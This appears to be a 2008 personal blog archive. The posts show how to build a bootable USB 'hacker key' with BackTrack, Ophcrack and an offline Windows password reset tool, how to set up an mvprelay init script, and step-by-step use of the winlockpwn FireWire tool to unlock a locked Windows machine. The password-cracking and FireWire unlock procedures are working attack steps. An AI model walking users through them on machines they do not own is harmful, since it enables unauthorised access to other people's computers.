Sunday, August 31, 2008

The Ultimate Hacker Key

The Ultimate Hacker Key (aka who needs a key chain)

While listening to PaulDotCom Security Weekly 114 I "discovered" UNetbootin - Universal Netboot Installer. Paul talked about installing Backtrack 3 on his USB key and how easy UNetbootin was to use. A colleague of mine recently expressed an interest in having Backtrack running on a USB Key so I thought I would take a look.

Installing Backtrack 3

Getting Backtrack installed and ready to boot from usb is so simple using UNetbootin it almost does not require directions. But here they are:
  1. Goto http://unetbootin.sourceforge.net/
  2. Click Download (for windows or Linux)
  3. Insert your USB Key
  4. Run UNetBootin
  5. Select BackTrack from the Distribution Download
  6. The Version populates automatically
  7. Select the drive that is your USB key (hint: it is probably not C:\)
  8. Click Okay
  9. Wait
  10. Reboot and if USB is a boot option the Backtrack menu should appear
So who needs a Key Chain

On several PaulDotCom Security Weekly podcasts, Larry referenced and described his key chain. It has some pretty cool things but who needs a key chain when you have a 8 GB Kingston USB key ($19.99 CDN at FutureShop last week). It got me thinking, whether I could get all those things on one device.

First up - Ophcrack

Ophcrack is a free Windows password cracker based on rainbow tables. So, lets get it installed:
  1. Plug in the USB Key
  2. Download the ophcrack LiveCD iso from http://ophcrack.sourceforge.net/download.php
  3. Mount the iso image (mount -o loop ophcrack-xp-livecd-2.0.1.iso /mnt/cdrom)
  4. Copy the main directory to the USB key (cp -ra /mnt/cdrom/ophcrack /media/usbkey/)
  5. Copy and rename the boot directory (cp -ra /mnt/cdrom/boot /media/usbkey/bootoph)
  6. umount /mnt/cdrom
  7. Edit the syslinux.cfg from Backtrack 3 (vim /media/usbkey/boot/syslinux/syslinux.cfg)
  8. Comment out any extra Backtrack 3 boot images that you don't plan to use
  9. Add in the boot section from /media/usbkey/bootoph/ophcrack.cfg like:
    LABEL xconf
    MENU LABEL Ophcrack Graphic mode
    KERNEL /bootoph/vmlinuz
    APPEND initrd=/bootoph/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=xconf;startx changes=/slax/
  10. Note that the /boot/ references were changed to /bootoph/
  11. Reboot

Second - Offline NT Password & Registry Editor

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2k/XP/Vista etc system. You do not need to know the old password to set a new one.

This is a very small live CD so putting it on its own USB key seems like a waste.
  1. Download the CD image from http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
  2. Unzip the zip the zip file to obtain the cd080802.iso
  3. mount the iso file (mount -o loop cd080802.iso /mnt/cdrom)
  4. create a boot directory called bootnpwd on the USB key (mkdir /media/usbkey/bootpwd)
  5. Copy all files froom the iso to the new directory (cp -ra /mnt/cdrom/* /media/usbkey/bootnpwd)
  6. umount /mnt/cdrom
  7. Edit the syslinux.cfg from Backtrack 3 (vim /media/usbkey/boot/syslinux/syslinux.cfg)
  8. Add in the boot section from /media/usbkey/bootnpwd/syslinux.cfg like:
    LABEL bootnwd
    MENU LABEL Offline NT Password and Registry Editor
    KERNEL /bootnpwd/vmlinuz
    APPEND rw vga=1 initrd=/bootnpwd/initrd.cgz,/bootnpwd/scsi.cgz
  9. Note that the /boot/ references were changed to /bootnpwd/
  10. Reboot
To Do List
  1. Add extra RainBow tables for OphCrack
  2. Add Ubuntu or some other General Purpose Distro
Notes
  1. For Windows users there are a number of utilities to mount an iso image as a drive. Do a Google Search or get a real OS ;-)
  2. The instructions above are from memory and while I have read it several times to remove obvious errors some may still exist. Leave feedback with corrections but use it has a guide...

Saturday, March 22, 2008

Starting mvprelay via init.d

I have created a script to start and stop mvprelay via the init.d process. The script is for Ubuntu 7.10 - the Gutsy Gibbon.
  1. Download mvprelay_init.tar.gz to /tmp
  2. cd /
  3. sudo tar xvfz /tmp/mvprelay_init.tar.gz
  4. vim /etc/default/mvprelay
    1. Update the MEDIA_SERVER variable with your server's IP address
    2. save the file
  5. sudo update-rc.d mvprelay start 50 2 3 4 5 .
  6. /etc/init.d/mvprelay start
This process should extract the files to the correct location under /etc (/etc/init.d and /etc/default). The update-rc.d command sets mvprelay to start in run modes 2, 3, 4 , 5 and priority 50 (which should be after the dhcpd, tftp mysql servers have started).

I have test the script, it starts, it stops, it restarts. mvpmc boots up from a cold boot. Other than that it is completely untested so your results may differ. No warranty provided, but I will help where I can.

Saturday, March 08, 2008

Breaking Windows with Firewire and Ubuntu

Adam Boileau (http://www.storm.net.nz/projects/16) recently released source code for a tool that can unlock a password locked Windows machine in seconds. While quite simple to use the documentation is not clear on how exactly it is used or how the parts work. I hope this helps:

These instructions are for Ubuntu 7.10 - the Gutsy Gibbon:

First install the required libraries:
apt-get install libdc1394-13 libraw1394-dev swig
Second download and install Python 2.3:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
sudo make install
This will install python in /usr/local which means you need to update each script to reference this location.

Third, Fixup the libraw1394:
vim /usr/local/include/libraw1394/raw1394.h
search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line

Fourth, download the software from http://www.storm.net.nz/projects/16
wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local instead of /usr for python)
make
Fifth, load the module and set some permissions:
sudo modprobe raw1394
sudo chmod 666 /dev/raw1394
Sixth, plug into the Windows machine

Seventh, load the ipod image to the firewire port
vim romtool (update the location of python to be /usr/local/bin/python)
./romtool -s 0 ipod.csr
Eighth, run businfo to check the port configurations:
vim businfo (update the location of python to be /usr/local/bin/python)
./businfo
At this point you should see two nodes listed. Node 0 is the ipod image that you loaded with romtool. Node 1 is the Windows machine.

Ninth, run the utility:
vim winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 1
You can get more information on the winlockpwn parameters by running the command without parameters. The first parameter is the firewire port, the second is the node (in this case the node for Windows) and the third is the type of Windows password screen.

Tenth, login to Windows

Use any password you want...